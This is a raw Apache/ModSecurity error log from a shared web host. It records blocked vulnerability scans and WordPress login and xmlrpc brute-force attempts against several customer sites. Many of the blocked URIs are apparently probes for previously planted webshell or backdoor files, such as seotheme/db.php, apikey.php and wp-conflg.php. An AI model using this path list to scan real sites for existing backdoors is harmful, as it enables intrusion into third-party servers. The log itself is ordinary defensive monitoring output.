[Tue May 26 18:07:23.656294 2026] [security2:error] [pid 960743:tid 960966] [client 141.98.11.224:57827] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.11.98.141.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rsmsi.org.in"] [uri "/rsmsi-contact.php"] [unique_id "ahWUA_QvEln_BHBy2zKHDAAAAOI"], referer: http://rsmsi.org.in/rsmsi-contact.php
[Tue May 26 18:07:23.919897 2026] [security2:error] [pid 960743:tid 960951] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUA_QvEln_BHBy2zKHCwAAANM"]
[Tue May 26 18:07:24.112424 2026] [security2:error] [pid 960743:tid 960894] [client 185.192.70.3:29393] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 3.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/.well-known/gecko-litespeed.php"] [unique_id "ahWUBPQvEln_BHBy2zKHIQAAAJo"]
[Tue May 26 18:07:25.060485 2026] [security2:error] [pid 960743:tid 960919] [client 185.192.70.70:48939] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 70.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/css/colors/midnight/install.php"] [unique_id "ahWUBfQvEln_BHBy2zKHOwAAALM"]
[Tue May 26 18:07:25.163841 2026] [security2:error] [pid 960743:tid 960983] [client 27.78.139.232:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUBPQvEln_BHBy2zKHMAAAAPM"]
[Tue May 26 18:07:25.927995 2026] [security2:error] [pid 960743:tid 960877] [client 185.192.70.95:58905] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-trackback.php"] [unique_id "ahWUBfQvEln_BHBy2zKHTwAAAIk"]
[Tue May 26 18:07:26.315338 2026] [security2:error] [pid 960743:tid 960829] [remote 94.76.235.103:40204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUBvQvEln_BHBy2zKHVgAA71U"]
[Tue May 26 18:07:26.468742 2026] [security2:error] [pid 960743:tid 960826] [remote 74.91.224.220:45962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUBvQvEln_BHBy2zKHWgAA0FI"]
[Tue May 26 18:07:26.849795 2026] [security2:error] [pid 960743:tid 960889] [client 185.192.70.78:51511] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 78.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/style-engine/bypass.php"] [unique_id "ahWUBvQvEln_BHBy2zKHagAAAJU"]
[Tue May 26 18:07:27.064746 2026] [security2:error] [pid 960743:tid 960965] [client 20.29.64.60:1799] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-plain.php"] [unique_id "ahWUBvQvEln_BHBy2zKHbgAAAOE"], referer: www.google.com
[Tue May 26 18:07:27.102462 2026] [security2:error] [pid 960743:tid 960925] [client 20.29.64.60:1804] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWUB_QvEln_BHBy2zKHdgAAALk"], referer: www.google.com
[Tue May 26 18:07:27.122981 2026] [security2:error] [pid 960743:tid 960961] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUBvQvEln_BHBy2zKHaQAAAN0"]
[Tue May 26 18:07:27.344200 2026] [security2:error] [pid 960743:tid 960930] [client 20.29.64.60:1806] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWUB_QvEln_BHBy2zKHdwAAAL4"]
[Tue May 26 18:07:27.809679 2026] [security2:error] [pid 960743:tid 960957] [client 185.192.70.72:23897] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/radio.php"] [unique_id "ahWUB_QvEln_BHBy2zKHfgAAANk"]
[Tue May 26 18:07:28.922664 2026] [security2:error] [pid 960743:tid 960943] [client 185.192.70.93:22037] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/mah.php"] [unique_id "ahWUCPQvEln_BHBy2zKHnAAAAMs"]
[Tue May 26 18:07:29.198699 2026] [security2:error] [pid 960743:tid 960979] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUCPQvEln_BHBy2zKHmQAAAO8"]
[Tue May 26 18:07:29.608845 2026] [security2:error] [pid 960743:tid 960888] [client 185.192.70.83:61311] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/plugins/dummyyummy/wp-signup.php"] [unique_id "ahWUCfQvEln_BHBy2zKHqwAAAJQ"]
[Tue May 26 18:07:30.030042 2026] [security2:error] [pid 960743:tid 960873] [client 150.223.194.179:64426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.194.223.150.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWUCfQvEln_BHBy2zKHtQAAAIU"]
[Tue May 26 18:07:30.182171 2026] [security2:error] [pid 960743:tid 960940] [client 20.29.64.60:1805] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahWUB_QvEln_BHBy2zKHbwAAAMg"], referer: www.google.com
[Tue May 26 18:07:30.286733 2026] [security2:error] [pid 960743:tid 960908] [client 20.29.64.60:1820] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWUCvQvEln_BHBy2zKHxAAAAKg"]
[Tue May 26 18:07:30.793055 2026] [security2:error] [pid 960743:tid 960962] [client 20.29.64.60:1843] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/srrvinih.php"] [unique_id "ahWUCvQvEln_BHBy2zKH2AAAAN4"], referer: www.google.com
[Tue May 26 18:07:31.144097 2026] [security2:error] [pid 960743:tid 960881] [client 20.29.64.60:1797] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWUC_QvEln_BHBy2zKH4AAAAI0"], referer: www.google.com
[Tue May 26 18:07:31.230234 2026] [security2:error] [pid 960743:tid 960883] [client 185.192.70.90:26579] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/css/colors/midnight/wp-login.php"] [unique_id "ahWUCvQvEln_BHBy2zKH2QAAAI8"]
[Tue May 26 18:07:31.598734 2026] [security2:error] [pid 960743:tid 960910] [client 185.192.70.83:63811] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-conflg.php"] [unique_id "ahWUC_QvEln_BHBy2zKH6gAAAKo"]
[Tue May 26 18:07:31.889134 2026] [security2:error] [pid 960743:tid 961000] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUC_QvEln_BHBy2zKH6QAAAQQ"]
[Tue May 26 18:07:31.938654 2026] [security2:error] [pid 960743:tid 960955] [client 185.192.70.101:56827] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-setup.php"] [unique_id "ahWUC_QvEln_BHBy2zKH8QAAANc"]
[Tue May 26 18:07:32.561959 2026] [security2:error] [pid 960743:tid 960974] [client 20.29.64.60:1803] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWUDPQvEln_BHBy2zKH_AAAAOo"]
[Tue May 26 18:07:32.870018 2026] [security2:error] [pid 960743:tid 960964] [client 185.192.70.75:40035] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 75.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/ms-themes.php"] [unique_id "ahWUDPQvEln_BHBy2zKIBwAAAOA"]
[Tue May 26 18:07:33.358007 2026] [security2:error] [pid 960743:tid 960942] [client 20.29.64.60:1823] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahWUDPQvEln_BHBy2zKH-AAAAMo"], referer: www.google.com
[Tue May 26 18:07:33.573096 2026] [security2:error] [pid 960743:tid 960975] [client 82.76.238.33:54817] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUDfQvEln_BHBy2zKIFgAAAOs"]
[Tue May 26 18:07:33.573255 2026] [security2:error] [pid 960743:tid 960975] [client 82.76.238.33:54817] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUDfQvEln_BHBy2zKIFgAAAOs"]
[Tue May 26 18:07:33.701253 2026] [security2:error] [pid 960743:tid 960881] [client 20.29.64.60:1820] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-plain.php"] [unique_id "ahWUDfQvEln_BHBy2zKIGQAAAI0"], referer: www.google.com
[Tue May 26 18:07:33.829656 2026] [security2:error] [pid 960743:tid 960977] [client 20.29.64.60:1805] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahWUDfQvEln_BHBy2zKIFAAAAO0"], referer: www.google.com
[Tue May 26 18:07:33.937810 2026] [security2:error] [pid 960743:tid 960956] [client 185.192.70.89:63915] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 89.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/assets/about.php"] [unique_id "ahWUDfQvEln_BHBy2zKIIgAAANg"]
[Tue May 26 18:07:34.400612 2026] [security2:error] [pid 960743:tid 960961] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUDfQvEln_BHBy2zKIJwAAAN0"]
[Tue May 26 18:07:34.777613 2026] [security2:error] [pid 960743:tid 960954] [client 20.29.64.60:1823] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahWUDfQvEln_BHBy2zKIIAAAANY"], referer: www.google.com
[Tue May 26 18:07:34.920500 2026] [security2:error] [pid 960743:tid 960969] [client 185.192.70.80:21519] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 80.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/style.php"] [unique_id "ahWUDvQvEln_BHBy2zKIPQAAAOU"]
[Tue May 26 18:07:35.543807 2026] [security2:error] [pid 960743:tid 960938] [client 20.29.64.60:1801] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWUD_QvEln_BHBy2zKISwAAAMY"]
[Tue May 26 18:07:35.829572 2026] [security2:error] [pid 960743:tid 960916] [client 185.192.70.88:33459] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/infi.php"] [unique_id "ahWUD_QvEln_BHBy2zKITwAAALA"]
[Tue May 26 18:07:36.380784 2026] [security2:error] [pid 960743:tid 960892] [client 20.29.64.60:1802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wbvidbsd.php"] [unique_id "ahWUEPQvEln_BHBy2zKIWgAAAJg"], referer: www.google.com
[Tue May 26 18:07:37.012642 2026] [security2:error] [pid 960743:tid 960965] [client 185.192.70.86:58287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/maint/index.php"] [unique_id "ahWUEfQvEln_BHBy2zKIbQAAAOE"]
[Tue May 26 18:07:37.122033 2026] [security2:error] [pid 960743:tid 960766] [remote 195.33.205.242:49034] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 242.205.33.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWUEPQvEln_BHBy2zKIZQAA2RY"]
[Tue May 26 18:07:37.605905 2026] [security2:error] [pid 960743:tid 960967] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUEfQvEln_BHBy2zKIcAAAAOM"]
[Tue May 26 18:07:38.674802 2026] [security2:error] [pid 960743:tid 960777] [remote 195.33.205.242:49034] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 242.205.33.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWUEvQvEln_BHBy2zKIlwAA5iE"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 18:07:39.197696 2026] [security2:error] [pid 960743:tid 960952] [client 185.192.70.75:49959] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 75.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/x.php"] [unique_id "ahWUE_QvEln_BHBy2zKIpQAAANQ"]
[Tue May 26 18:07:39.624718 2026] [security2:error] [pid 960743:tid 960961] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUE_QvEln_BHBy2zKIqAAAAN0"]
[Tue May 26 18:07:41.169179 2026] [security2:error] [pid 960743:tid 961000] [client 185.192.70.71:35913] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/IXR/index.php"] [unique_id "ahWUFfQvEln_BHBy2zKI1wAAAQQ"]
[Tue May 26 18:07:42.657079 2026] [security2:error] [pid 960743:tid 960783] [remote 194.163.139.224:43272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUFvQvEln_BHBy2zKI-gAA2ic"]
[Tue May 26 18:07:42.683962 2026] [security2:error] [pid 960743:tid 960907] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUFvQvEln_BHBy2zKI9gAAAKc"]
[Tue May 26 18:07:43.088365 2026] [security2:error] [pid 960743:tid 960875] [client 185.192.70.86:47461] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/css/index.php"] [unique_id "ahWUF_QvEln_BHBy2zKJCgAAAIc"]
[Tue May 26 18:07:43.767201 2026] [security2:error] [pid 960743:tid 960804] [remote 94.76.235.103:44980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUF_QvEln_BHBy2zKJFwAAszw"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:07:44.033165 2026] [security2:error] [pid 960743:tid 960917] [client 82.76.238.33:55241] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUGPQvEln_BHBy2zKJJAAAALE"]
[Tue May 26 18:07:44.033312 2026] [security2:error] [pid 960743:tid 960917] [client 82.76.238.33:55241] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUGPQvEln_BHBy2zKJJAAAALE"]
[Tue May 26 18:07:44.314453 2026] [security2:error] [pid 960743:tid 960879] [client 185.192.70.77:44197] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/images/index22.php"] [unique_id "ahWUGPQvEln_BHBy2zKJLgAAAIs"]
[Tue May 26 18:07:45.180354 2026] [security2:error] [pid 960743:tid 960895] [client 185.192.70.99:22457] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-user.php"] [unique_id "ahWUGfQvEln_BHBy2zKJRAAAAJs"]
[Tue May 26 18:07:45.460489 2026] [security2:error] [pid 960743:tid 960877] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUGfQvEln_BHBy2zKJQwAAAIk"]
[Tue May 26 18:07:46.210269 2026] [security2:error] [pid 960743:tid 960885] [client 185.192.70.87:38097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 87.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/pomo/about.php"] [unique_id "ahWUGvQvEln_BHBy2zKJWgAAAJE"]
[Tue May 26 18:07:47.254527 2026] [fcgid:warn] [pid 960743:tid 960982] (70014)End of file found: [client 167.71.198.58:50588] mod_fcgid: can't get data from http client
[Tue May 26 18:07:47.924305 2026] [security2:error] [pid 960743:tid 960964] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUG_QvEln_BHBy2zKJegAAAOA"]
[Tue May 26 18:07:48.111358 2026] [security2:error] [pid 960743:tid 960953] [client 185.192.70.95:38993] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/pomo/index.php"] [unique_id "ahWUHPQvEln_BHBy2zKJhwAAANU"]
